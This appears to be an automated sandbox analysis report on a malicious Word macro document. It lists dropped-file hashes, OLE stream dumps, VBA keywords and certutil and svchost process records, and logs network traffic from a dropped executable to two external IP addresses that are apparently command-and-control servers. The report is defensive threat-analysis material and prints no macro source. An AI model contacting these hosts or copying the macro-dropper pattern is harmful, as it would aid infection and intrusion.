SSDEEP: | 24:89p/XRlegvB3q6iL7Y2+G/XRlegvB3q6iL7c:8j/XjstfY2+G/Xjstfc |
MD5: | B82B40CDE8C91EC708728BCAEB6ED185 |
SHA1: | 73DEF80ECE7D0BF0DB7E208F1F3DBAA37EA7E30C |
SHA-256: | A8EC0AFED648FDD1645D7A8603EA8DF354A7CE88C2473080425B516F6019B809 |
SHA-512: | 6ACD2B9A72D586E263E2BED830AF542786454BCBA4DE48A787A991509AFF0ECB6FB90215DD2298558AED87C12373BDDB8D14251259B51A2996714B6AFE87521F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 438 |
Entropy (8bit): | 4.369509432724656 |
Encrypted: | false |
SSDEEP: | 6:M6dYrtg9CMdg9CMdg9UYrtg9CMUg9UYrhMUg9CMRMUg9s:M6IgEEgEEgJgEtg9tgEytgC |
MD5: | 9DDA3519F04FDEEB47B198EDD010E507 |
SHA1: | AC6C4075745C0F0064ADED9504934DDA44CB30E9 |
SHA-256: | A677F9380C0B0EB229D861D18FDDFFD4642FFCAF1ABF9007A77EC37F05F0BDBC |
SHA-512: | 8C0372F4659764915EC4D9EBA74F71E4464F1E5C56A0B31AF05638A747790B9AD2834642D94EB0512AEA1B5D8E292D9CB0029A849A0C91244376A50EC6501667 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1994 |
Entropy (8bit): | 4.503983456170819 |
Encrypted: | false |
SSDEEP: | 48:8Nm/XT0jDJQllhHDlOtQh2Nm/XT0jDJQllhHDlOtQ/:84/XojVtQh24/XojVtQ/ |
MD5: | D79CF64F781B213CE72965233760B911 |
SHA1: | 0EC073D030B6690CD751F9B6F07371F92ECF7077 |
SHA-256: | 205B59476CA151EB3DBC738D47447A7E7CD0E293F3FB56572B7A9B87F2EACE34 |
SHA-512: | 870D1D8140863E81B652685647A97E9DCF7867518D2367BDC8B04D8930E734D8CAE592DC810A22BBA28E79C54657B047DBC3324ABE265313AF25DBC72FB6B734 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\certutil.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 446976 |
Entropy (8bit): | 7.675102075961339 |
Encrypted: | false |
SSDEEP: | 12288:NWSikkQXsGOCAStP1W+TXPc9JXvaWv7j3:ESiL5Sp1W+TYfHj |
MD5: | 706EA7F029E6BC4DBF845DB3366F9A0E |
SHA1: | 942443DFB8784066523DB761886115E08C99575F |
SHA-256: | FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC |
SHA-512: | 036D5DE7E732302EF81989FBA62ABB1375119FC8141748D6548ED2310E95BDC07468ADA5CBF06C4F721B2B95CAF51E3267D4EF6DB2A2031CF5C8B2ABEE1C15A3 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 595972 |
Entropy (8bit): | 5.85065356609278 |
Encrypted: | false |
SSDEEP: | 12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9 |
MD5: | D631AB4CEFF199B52FF4E4B7AAD0199D |
SHA1: | F30002C31BF32184507182100942A2012F0B8703 |
SHA-256: | 9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE |
SHA-512: | 56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 595972 |
Entropy (8bit): | 5.85065356609278 |
Encrypted: | false |
SSDEEP: | 12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9 |
MD5: | D631AB4CEFF199B52FF4E4B7AAD0199D |
SHA1: | F30002C31BF32184507182100942A2012F0B8703 |
SHA-256: | 9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE |
SHA-512: | 56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 6.919205506848504 |
TrID: |
|
File name: | sample1.doc |
File size: | 850432 |
MD5: | 7dbd8ecfada1d39a81a58c9468b91039 |
SHA1: | 0d21e2742204d1f98f6fcabe0544570fd6857dd3 |
SHA256: | dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95 |
SHA512: | a851ac80b43ebdb8e990c2eb3daabb456516fc40bb43c9f76d0112674dbd6264efce881520744f0502f2962fc0bb4024e7d73ea66d56bc87c0cc6dfde2ab869a |
SSDEEP: | 12288:emkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCspBZZLFLIx/mBDOq1a:emkvVW9gnyQxtN9eEBDOQa |
File Content Preview: | ........................>.......................g...........j...............Z...[...\...]...^..._...`...a...b...c...d...e...f.................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea2aaa4b4b4a4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "sample1.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Comments: | |
Template: | |
Last Saved By: | |
Revion Number: | 7 |
Total Edit Time: | 1200 |
Create Time: | 2020-05-10 00:31:00 |
Last Saved Time: | 2020-10-28 04:44:00 |
Number of Pages: | 2 |
Number of Words: | 89482 |
Number of Characters: | 510049 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1252 |
Number of Lines: | 4250 |
Number of Paragraphs: | 1196 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 3696 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 3696 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . ' E . . . . . . . . . . . . . . . . . . . ( . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . |
Data Raw: | 01 16 03 00 00 18 01 00 00 dc 06 00 00 fc 00 00 00 02 02 00 00 ff ff ff ff e3 06 00 00 7b 0b 00 00 00 00 00 00 01 00 00 00 f1 27 45 f5 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 32 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
#Else |
VB_Name |
VB_Creatable |
".pdf"): |
SetTask(Task |
VB_Exposed |
Null, |
Form_Close() |
("doc"): |
Formt, |
VB_TemplateDerived |
Function |
(ByVal |
String |
Right(Range.Text, |
String) |
Form_Close |
Long) |
Long, |
VB_Customizable |
Task, |
("xls"): |
FileName:=STP |
".xls |
PtrSafe |
Left(ActiveDocument.Paragraphs(One).Range.Text, |
Declare |
"ThisDocument" |
SetTask |
False |
FileFormat:=wdFormatText |
Attribute |
Private |
VB_PredeclaredId |
Sleep |
VB_GlobalNameSpace |
VB_Base |
".pdf,In") |
Document_Close() |
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 114 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.2359563651 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.25569624217 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.473780805052 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00 |
Stream Path: 1Table, File Type: data, Stream Size: 7386 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | data |
Stream Size: | 7386 |
Entropy: | 5.92077573609 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . |
Data Raw: | 1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
Stream Path: Data, File Type: data, Stream Size: 187989 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 187989 |
Entropy: | 7.97862280177 |
Base64 Encoded: | True |
Data ASCII: | U . . . D . d . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . . . . . . . . . . . . . . . . . . C . . . * . . . . A . . . . . . . . . . . . . . . . . . . . . . t . e . m . p . l . a . t . e . . . . . . . . . . . . . . . b . . . . . . . . . . . . b r . . . . 7 . a . _ . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . b r . . . . 7 . a . _ . . . . P N G . . . . . . . . I H D R . . . O . . . . . . . . . 3 0 . u |
Data Raw: | 55 de 02 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 31 e3 1d c3 03 c3 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 2a 00 00 00 04 41 01 00 00 00 05 c1 12 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 65 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 367 |
Entropy: | 5.29037636248 |
Base64 Encoded: | True |
Data ASCII: | I D = " { D 4 7 2 8 3 5 A - 3 8 9 1 - 4 D B 9 - 8 6 F 0 - 0 C 1 2 4 A F F D 6 E 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 8 0 A E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 6 9 4 7 7 F B 8 B 0 7 1 8 0 8 1 8 0 8 1 8 " . . G C = " 2 4 2 6 C 5 8 9 D D 1 6 D E 1 6 D E E 9 " . . . . [ H o s t E x t e n d e r I n f o ] |
Data Raw: | 49 44 3d 22 7b 44 34 37 32 38 33 35 41 2d 33 38 39 31 2d 34 44 42 39 2d 38 36 46 30 2d 30 43 31 32 34 41 46 46 44 36 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 41 |
Entropy: | 3.07738448508 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2845 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2845 |
Entropy: | 4.32828178006 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 513 |
Entropy: | 6.25624133358 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y { . ` . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . . |
Data Raw: | 01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 7b a3 60 0a 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: WordDocument, File Type: data, Stream Size: 627764 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 627764 |
Entropy: | 6.04018774642 |
Base64 Encoded: | False |
Data ASCII: | . . . . { . . . . . . . . . . . . . . . . . . . . . . . . - . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . f . . . f . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 eb 2d 09 00 0e 00 62 6a 62 6a 84 bd 84 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 94 09 00 e6 d7 d5 66 e6 d7 d5 66 eb 25 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 27, 2021 00:19:05.781451941 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.090272903 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.090476036 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.091706991 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.091789961 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.399941921 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.400216103 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.400232077 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.400314093 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.707856894 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.708199978 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.708224058 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.709530115 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.709599972 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:07.067719936 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.121426105 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.121526957 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.122493982 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.122662067 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.176059008 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.176095963 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.176537037 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.228121042 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.228171110 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.228199005 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.228286028 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49172 | 177.130.51.198 | 80 | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 27, 2021 00:19:06.091706991 CEST | 11157 | OUT | |
May 27, 2021 00:19:06.091789961 CEST | 11159 | OUT | |
May 27, 2021 00:19:06.400232077 CEST | 11160 | OUT | |
May 27, 2021 00:19:06.400314093 CEST | 11162 | OUT | |
May 27, 2021 00:19:06.709530115 CEST | 11162 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49173 | 91.121.87.90 | 8080 | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 27, 2021 00:19:07.122493982 CEST | 11163 | OUT | |
May 27, 2021 00:19:07.228199005 CEST | 11168 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 00:16:31 |
Start date: | 27/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f120000 |
File size: | 1424032 bytes |
MD5 hash: | 95C38D04597050285A18F66039EDB456 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 00:17:42 |
Start date: | 27/05/2021 |
Path: | C:\Windows\System32\certutil.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa70000 |
File size: | 1192448 bytes |
MD5 hash: | 4586B77B18FA9A8518AF76CA8FD247D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 00:17:43 |
Start date: | 27/05/2021 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0e0000 |
File size: | 27136 bytes |
MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
